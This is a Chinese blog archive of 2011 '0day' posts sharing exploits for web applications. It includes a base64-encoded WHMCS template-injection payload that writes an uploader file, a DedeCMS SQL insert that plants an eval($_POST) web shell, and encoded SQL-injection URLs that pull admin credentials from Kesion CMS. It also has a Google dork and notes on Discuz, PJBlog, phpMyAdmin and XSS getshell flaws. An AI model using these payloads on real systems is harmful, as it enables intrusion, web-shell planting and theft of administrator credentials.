公告是神马?该怎么写呢?还没想好

feed订阅 腾讯微博 新浪微博 你好,欢迎光临! 

许诺

Category Archives: 0day

一些程序的漏洞

whmcs主机管理系统0day

2011.12.11 , 0day , 5 Comments , 743 views

T00ls看到的 国内一些小IDC悲剧了

1

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

base64解密后:

Tags: , ,

DEDECMS拿SHELL EXP

2011.08.11 , 0day , No Comments , 744 views

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:

1

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表单提交,shell 就在同目录下 1[......]

Read more

Tags:

科讯kesion 6.x – 7.06 第二枚注射漏洞

2011.07.28 , 0day , No Comments , 579 views

作者:goingta

1

http://www.xxx.com/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500

科讯 6.x – 7.06 SQL 注射漏洞

2011.07.27 , 0day , No Comments , 542 views

作者:goingta

1

http://www.xxx.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500

最土团购的一些漏洞《转t00ls-小蟑螂》

2011.07.25 , 0day , 1 Comment , 970 views

第一个是上传漏洞 此漏洞在6月份出的新版本中已经得到修复
最土自己写了upload_image上传函数 本身挺安全的 但是upload.php没有用这个函数
第25行

1

$upext='txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid';

phpmyadmin 0day exp (oldjun)

2011.07.12 , 0day , 1 Comment , 946 views

虽然还是很鸡肋(要求根目录下存在config文件夹且可写),不过好很多了。可以无视session.auto_start配置了。

Tags:

Discuz! X2 SQL注射漏洞(转载)

2011.06.29 , 0day , No Comments , 1,149 views

作者 jannock
Discuz! X2 SQL注射漏洞,支持Union

文件:source\module\forum\forum_attachment.php

详细:

Tags: ,

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码bug

2011.06.25 , 0day , No Comments , 561 views

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术

在文件Action.asp中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

ElseIf Request.QueryString("action") = "updatepassto" Then   //第307行
If ChkPost() Then
Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass
e_ID = CheckStr(UnEscape(Request.QueryString("id")))
e_Pass = CheckStr(UnEscape(Request.QueryString("pass")))
e_RePass = CheckStr(UnEscape(Request.QueryString("repass")))
Set e_Rs = Server.CreateObject("Adodb.Recordset")
e_Rs.open "Select * From [blog_Member] Where [mem_ID]="&e_ID, Conn, 1, 3
e_hash = e_Rs("mem_salt")
d_pass = SHA1(e_Pass&e_hash)
e_Rs("mem_Password") = d_pass
e_Rs.update
e_Rs.Close
Set e_Rs = nothing
response.Write("1")
Else
response.write lang.Err.info(999)
End If

dedecms xss oday通杀所有版本 可getshell

2011.06.25 , 0day , No Comments , 747 views

dedecms xss oday通杀所有版本(T00ls首发) by haris

作者:haris

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell

为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.[......]

Read more

iGiveTest 2.1.0注入漏洞

2011.06.23 , 0day , No Comments , 586 views

# Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
Google Dork: "Powered by iGiveTest"
随便注册个号
http://localhost/[PATH]/users.php?action=group[......]

Read more

无觅相关文章插件,快速提升流量